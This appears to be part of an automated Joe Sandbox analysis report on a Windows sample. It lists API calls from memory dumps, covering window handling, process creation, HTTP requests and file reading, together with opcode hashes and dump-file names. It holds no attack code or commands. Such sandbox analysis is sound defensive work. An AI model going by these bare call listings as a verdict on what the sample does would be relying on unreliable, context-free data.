                                                                                                      Similarity
                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 895679908-0
                                                                                                      • Opcode ID: 6d9f623df89b781374954f779ab829341d3cb539aef0c6418a0d32fc98e3233f
                                                                                                      • Instruction ID: a1b0dab21000b7c7d4581a07f4a02e949024eceb42dea0c4afcecf645dbb4759
                                                                                                      • Opcode Fuzzy Hash: 6d9f623df89b781374954f779ab829341d3cb539aef0c6418a0d32fc98e3233f
                                                                                                      • Instruction Fuzzy Hash: C2718331900B09AFDB20DFA8CD45BAEBBF5FF44704F144519E58AE26A0E775E944CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00D90784
                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00D9078F
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00D9079A
                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00D907A5
                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00D907B0
                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00D907BB
                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00D907C6
                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00D907D1
                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00D907DC
                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00D907E7
                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00D907F2
                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00D907FD
                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00D90808
                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00D90813
                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00D9081E
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00D90829
                                                                                                      • GetCursorInfo.USER32(?), ref: 00D90839
                                                                                                      • GetLastError.KERNEL32 ref: 00D9087B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215588206-0
                                                                                                      • Opcode ID: 3203cc09b173348232d2bb087b822eae6006cc9909272ba93459227b5ffe25bf
                                                                                                      • Instruction ID: 86e0fdbb3b6e2452e775e47d21cb9c5b74cc691827791a02ae79f6c4daad6191
                                                                                                      • Opcode Fuzzy Hash: 3203cc09b173348232d2bb087b822eae6006cc9909272ba93459227b5ffe25bf
                                                                                                      • Instruction Fuzzy Hash: 51418570E083196EDB10DFBA9C8585EBFE8FF04354B54452AE11DE7291DA78E801CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D30456
                                                                                                        • Part of subcall function 00D3047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00DE170C,00000FA0,CDA5924D,?,?,?,?,00D52753,000000FF), ref: 00D304AC
                                                                                                        • Part of subcall function 00D3047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D52753,000000FF), ref: 00D304B7
                                                                                                        • Part of subcall function 00D3047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D52753,000000FF), ref: 00D304C8
                                                                                                        • Part of subcall function 00D3047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D304DE
                                                                                                        • Part of subcall function 00D3047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D304EC
                                                                                                        • Part of subcall function 00D3047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D304FA
                                                                                                        • Part of subcall function 00D3047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D30525
                                                                                                        • Part of subcall function 00D3047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D30530
                                                                                                      • ___scrt_fastfail.LIBCMT ref: 00D30477
                                                                                                        • Part of subcall function 00D30433: __onexit.LIBCMT ref: 00D30439
                                                                                                      Strings
                                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D304B2
                                                                                                      • SleepConditionVariableCS, xrefs: 00D304E4
                                                                                                      • kernel32.dll, xrefs: 00D304C3
                                                                                                      • WakeAllConditionVariable, xrefs: 00D304F2
                                                                                                      • InitializeConditionVariable, xrefs: 00D304D8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                      • API String ID: 66158676-1714406822
                                                                                                      • Opcode ID: b268f650c89c23952edf665cc55a66ff0344a63a17f15fd34cc860592c41551b
                                                                                                      • Instruction ID: 11f00042f2ede8bdb6211475a112f01736223aa7e671e37ef586ed9ca28a8051
                                                                                                      • Opcode Fuzzy Hash: b268f650c89c23952edf665cc55a66ff0344a63a17f15fd34cc860592c41551b
                                                                                                      • Instruction Fuzzy Hash: B621F336B40300AFD7107BA4AC56B6A3FE9EB05F61F040529F902D6BD0DB709C04CA70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen
                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                      • API String ID: 176396367-1603158881
                                                                                                      • Opcode ID: f1845dfa69e4e55a2f225b8a16241c33a0a19d93b5fcaf13b8e2d3cb85b9ccc6
                                                                                                      • Instruction ID: f6c4a64d229677e1e3fccba2929d9c161e6e833fef627eda26aaed7787b7028c
                                                                                                      • Opcode Fuzzy Hash: f1845dfa69e4e55a2f225b8a16241c33a0a19d93b5fcaf13b8e2d3cb85b9ccc6
                                                                                                      • Instruction Fuzzy Hash: 9DE1A632A00515ABCB249FB8D4416EDFBB5FF14710F19C11AE59AE7250EB30EE85A7B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CharLowerBuffW.USER32(00000000,00000000,00DADCD0), ref: 00D84E81
                                                                                                      • _wcslen.LIBCMT ref: 00D84E95
                                                                                                      • _wcslen.LIBCMT ref: 00D84EF3
                                                                                                      • _wcslen.LIBCMT ref: 00D84F4E
                                                                                                      • _wcslen.LIBCMT ref: 00D84F99
                                                                                                      • _wcslen.LIBCMT ref: 00D85001
                                                                                                        • Part of subcall function 00D2FD60: _wcslen.LIBCMT ref: 00D2FD6B
                                                                                                      • GetDriveTypeW.KERNEL32(?,00DD7C10,00000061), ref: 00D8509D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                      • API String ID: 2055661098-1000479233
                                                                                                      • Opcode ID: bdbb250e81fdfba716fc8faffa237500412862d5b03022ed2ea12d4b9bf95d4d
                                                                                                      • Instruction ID: 8b7a8727ef04f0e5ed910c920eaff752401eb84963ab655edac36138e7f81b30
                                                                                                      • Opcode Fuzzy Hash: bdbb250e81fdfba716fc8faffa237500412862d5b03022ed2ea12d4b9bf95d4d
                                                                                                      • Instruction Fuzzy Hash: 32B1F531608302AFC710EF28D890A6AB7E5FFA4720F54491DF596C7295EB34D884CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _wcslen.LIBCMT ref: 00D9BAF7
                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D9BB0F
                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00D9BB33
                                                                                                      • _wcslen.LIBCMT ref: 00D9BB5F
                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D9BB73
                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00D9BB95
                                                                                                      • _wcslen.LIBCMT ref: 00D9BC91
                                                                                                        • Part of subcall function 00D80E63: GetStdHandle.KERNEL32(000000F6), ref: 00D80E82
                                                                                                      • _wcslen.LIBCMT ref: 00D9BCAA
                                                                                                      • _wcslen.LIBCMT ref: 00D9BCC5
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D9BD15
                                                                                                      • GetLastError.KERNEL32(00000000), ref: 00D9BD66
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D9BD98
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9BDA9
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9BDBB
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00D9BDCD
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D9BE42
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2178637699-0
                                                                                                      • Opcode ID: c661782134ca6f894a94181082ac6c71aabcc41fcede2f97f1c717364c88362f
                                                                                                      • Instruction ID: 00c5ae4ea39826fa99590b8bd4ca6556e94303da94fba2f979cfa9a892ac3f45
                                                                                                      • Opcode Fuzzy Hash: c661782134ca6f894a94181082ac6c71aabcc41fcede2f97f1c717364c88362f
                                                                                                      • Instruction Fuzzy Hash: A8F1C331604340AFCB14EF24D991B6ABBE5EF85324F19855EF8898B2A1DB71DC44CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00DADCD0), ref: 00D94A18
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D94A2A
                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00DADCD0), ref: 00D94A4F
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00DADCD0), ref: 00D94A9B
                                                                                                      • StringFromGUID2.OLE32(?,?,00000028,?,00DADCD0), ref: 00D94B05
                                                                                                      • SysFreeString.OLEAUT32(00000009), ref: 00D94BBF
                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D94C25
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00D94C4F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                      • API String ID: 354098117-199464113
                                                                                                      • Opcode ID: f6033a1e55e08614df357966b3e56dbf26485a5cf88c825bdf2eb3dd3b390bfa
                                                                                                      • Instruction ID: f237ad179e6170dca549373818205f8e22e8b12c631ef1a8fc53aff222b8719b
                                                                                                      • Opcode Fuzzy Hash: f6033a1e55e08614df357966b3e56dbf26485a5cf88c825bdf2eb3dd3b390bfa
                                                                                                      • Instruction Fuzzy Hash: 6A121B75A00215EFDF14DF94C884EAAB7B5FF49318F188098F946AB252D731ED46CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenuItemCount.USER32(00DE2990), ref: 00D53F4C
                                                                                                      • GetMenuItemCount.USER32(00DE2990), ref: 00D53FFC
                                                                                                      • GetCursorPos.USER32(?), ref: 00D54040
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00D54049
                                                                                                      • TrackPopupMenuEx.USER32(00DE2990,00000000,?,00000000,00000000,00000000), ref: 00D5405C
                                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D54068
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 36266755-4108050209
                                                                                                      • Opcode ID: fe320cec0647982b665521d574c0bdc52174165039fc0656e0183aa871701970
                                                                                                      • Instruction ID: be4b824a2c94d284753460578f2b42a660b91d8160554b24105d8929f491e638
                                                                                                      • Opcode Fuzzy Hash: fe320cec0647982b665521d574c0bdc52174165039fc0656e0183aa871701970
                                                                                                      • Instruction Fuzzy Hash: C3710771640205BEEF218F68DC4AFAABF69FF01368F144215FD15A61E0C7B1A954DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(00000000,?), ref: 00DA774A
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DA77BE
                                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DA77E0
                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA77F3
                                                                                                      • DestroyWindow.USER32(?), ref: 00DA7814
                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D10000,00000000), ref: 00DA7843
                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA785C
                                                                                                      • GetDesktopWindow.USER32 ref: 00DA7875
                                                                                                      • GetWindowRect.USER32(00000000), ref: 00DA787C
                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DA7894
                                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DA78AC
                                                                                                        • Part of subcall function 00D121E4: GetWindowLongW.USER32(?,000000EB), ref: 00D121F2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                      • String ID: 0$tooltips_class32
                                                                                                      • API String ID: 2429346358-3619404913
                                                                                                      • Opcode ID: aeeeee35980604a5db83bdf618a0bee0f5003fa3effdd3c0792219d632656908
                                                                                                      • Instruction ID: 09406769b63df50a805da117e6ce60fe4523b1c62ed44db4e4387fd463f61f8e
                                                                                                      • Opcode Fuzzy Hash: aeeeee35980604a5db83bdf618a0bee0f5003fa3effdd3c0792219d632656908
                                                                                                      • Instruction Fuzzy Hash: 4F716874148344AFD725DF68CC48BAA7BEAEBCA300F08051DF98687361CB74A942DB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D12441: GetWindowLongW.USER32(00000000,000000EB), ref: 00D12452
                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00DA9AA6
                                                                                                        • Part of subcall function 00DA7FD3: ClientToScreen.USER32(?,?), ref: 00DA7FF9
                                                                                                        • Part of subcall function 00DA7FD3: GetWindowRect.USER32(?,?), ref: 00DA806F
                                                                                                        • Part of subcall function 00DA7FD3: PtInRect.USER32(?,?,?), ref: 00DA807F
                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DA9B0F
                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DA9B1A
                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DA9B3D
                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DA9B84
                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DA9B9D
                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DA9BB4
                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DA9BD6
                                                                                                      • DragFinish.SHELL32(?), ref: 00DA9BDD
                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00DA9CD0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                      • API String ID: 221274066-3440237614
                                                                                                      • Opcode ID: 1f7ba0f7aaedcd3b404c8da8e98f884f255df8244643b7a56d9c6355bcf67c96
                                                                                                      • Instruction ID: 7c5096687c821d5d0d9553862a4e2b819aa10287bbafb149eb88f1730936919b
                                                                                                      • Opcode Fuzzy Hash: 1f7ba0f7aaedcd3b404c8da8e98f884f255df8244643b7a56d9c6355bcf67c96
                                                                                                      • Instruction Fuzzy Hash: 0A616D71508341AFC705EF60EC85DAFBBE9EF89750F00091EF596922A1DB709A49CB72
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D8CE0D
                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D8CE20
                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D8CE34
                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D8CE4D
                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00D8CE90
                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D8CEA6
                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D8CEB1
                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D8CEE1
                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D8CF39
                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D8CF4D
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00D8CF58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                      • Opcode ID: 65b380d340adcec8db48cb1c9be3f9da8509c02554b773b7dc0d50b526e81502
                                                                                                      • Instruction ID: 9a36e79d1f8e36f2b5c47852d62483601beaaf623f830578f104ff37872ac925
                                                                                                      • Opcode Fuzzy Hash: 65b380d340adcec8db48cb1c9be3f9da8509c02554b773b7dc0d50b526e81502
                                                                                                      • Instruction Fuzzy Hash: 755157B1511308FFEB22AF60C988AAA7BBEEF09744F048419FA46D6650D734D944DBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00DA8EF1
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00DA8F01
                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00DA8F0C
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DA8F19
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00DA8F27
                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DA8F36
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00DA8F3F
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00DA8F46
                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DA8F57
                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DB0C04,?), ref: 00DA8F70
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00DA8F80
                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 00DA8FA0
                                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DA8FD0
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00DA8FF8
                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DA900E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
